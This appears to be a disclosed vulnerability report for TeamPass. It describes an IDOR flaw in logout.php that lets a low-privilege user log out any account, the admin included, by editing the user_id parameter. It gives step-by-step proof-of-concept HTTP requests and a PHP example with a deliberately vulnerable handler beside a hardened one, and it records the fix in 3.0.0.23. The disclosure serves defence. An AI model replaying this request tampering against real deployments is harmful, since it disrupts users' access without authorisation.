IDOR Vulnerability Allows a Low-Level User to Log Out Everyone, Including the Admin, in nilsteampassnet/teampass

Valid

Reported on

Feb 28th 2023


Description

An IDOR vulnerability allows a low-level user to log out any user in the system, including the admin, simply by changing the user ID in the logout request.

Proof of Concept

Step 1: Log in as admin.

Step 2: Go to the user page and add a user. Set the role to Default.

Step 3: Log in as the new user.

Step 4: Log out as the new user and capture the request. Note that the user ID is passed as the user_id query parameter:

GET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Change user_id to any other user's ID. For this example, we use 1, the admin's user_id.

Below is the response to the modified request.

HTTP/1.1 200 OK
Date: Tue, 28 Feb 2023 07:25:00 GMT
Server: Apache/2.4.54 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/html; charset=utf-8


    <script type="text/javascript" src="../../plugins/store.js/dist/store.everything.min.js"></script>
    <script language="javascript" type="text/javascript">
    <!--
        // Clear localstorage
        store.remove("teampassApplication");
        store.remove("teampassSettings");
        store.remove("teampassUser");
        store.remove("teampassItem");
        sessionStorage.clear();
        
        setTimeout(function() {
            document.location.href="../../index.php"
        }, 1);
    -->
    </script>

Step 5: The admin has been logged out.
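The defect class behind these steps, as an added illustration (not TeamPass's own code): a logout handler that acts on a client-supplied user_id, beside the hardened form that only ever revokes the identity bound to the caller's own session. The SessionStore class and the constructed ids and tokens are assumptions for the example.

```php
<?php
// Added example, not TeamPass's own code: the IDOR class this report describes,
// a logout endpoint that trusts a client-supplied user_id, beside the hardened
// form that only acts on the identity bound to the caller's own session.
// SessionStore and the constructed ids/tokens below are assumptions for illustration.
declare(strict_types=1);
/** In-memory stand-in for server-side login state: user id => session token. */
final class SessionStore
{
    /** @param array<int,string> $active */
    public function __construct(private array $active) {}
    public function revoke(int $userId): bool
    {
        if (!isset($this->active[$userId])) { return false; }
        unset($this->active[$userId]);
        return true;
    }

    public function isLoggedIn(int $userId): bool { return isset($this->active[$userId]); }
}

/** Vulnerable: logs out whatever id the client put in the query string. */
function logoutVulnerable(SessionStore $store, array $get): ?int
{
    if (!isset($get['user_id']) || !ctype_digit((string) $get['user_id'])) { return null; }
    $target = (int) $get['user_id'];
    $store->revoke($target);   // any authenticated caller can pick any target
    return $target;
}
/** Hardened: the caller's session decides who is logged out; user_id is ignored. */
function logoutHardened(SessionStore $store, array $session, array $get): ?int
{
    $self = $session['user_id'] ?? null;
    if (!is_int($self)) { return null; }   // not logged in: nothing to revoke
    // A supplied id that disagrees with the session is tampering to log, not an instruction.
    if (isset($get['user_id']) && (string) $get['user_id'] !== (string) $self) {
        error_log("logout: ignoring user_id={$get['user_id']} for session user {$self}");
    }
    $store->revoke($self);
    return $self;
}

// Constructed scenario from the report: caller is user 10000001, URL names admin id 1.
$store = new SessionStore([1 => 'admin-token', 10000001 => 'lowpriv-token']);
logoutVulnerable($store, ['user_id' => '1']);
printf("vulnerable: admin still logged in? %s\n", $store->isLoggedIn(1) ? 'yes' : 'no');
$store = new SessionStore([1 => 'admin-token', 10000001 => 'lowpriv-token']);
logoutHardened($store, ['user_id' => 10000001], ['user_id' => '1']);
printf("hardened:   admin still logged in? %s\n", $store->isLoggedIn(1) ? 'yes' : 'no');
```

The mismatch log line in the hardened handler is the detection hook: a user_id parameter that differs from the session's user is the signal to alert on.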

Impact

An attacker can log everyone out of the system without the victims knowing.

nilsteampassnet validated this vulnerability 14 days ago
nilsteampassnet marked this as fixed in 3.0.0.23 with commit 4e06fb 14 days ago
This vulnerability has been assigned a CVE
nilsteampassnet published this vulnerability 14 days ago
logout.php#L35-L102 has been validated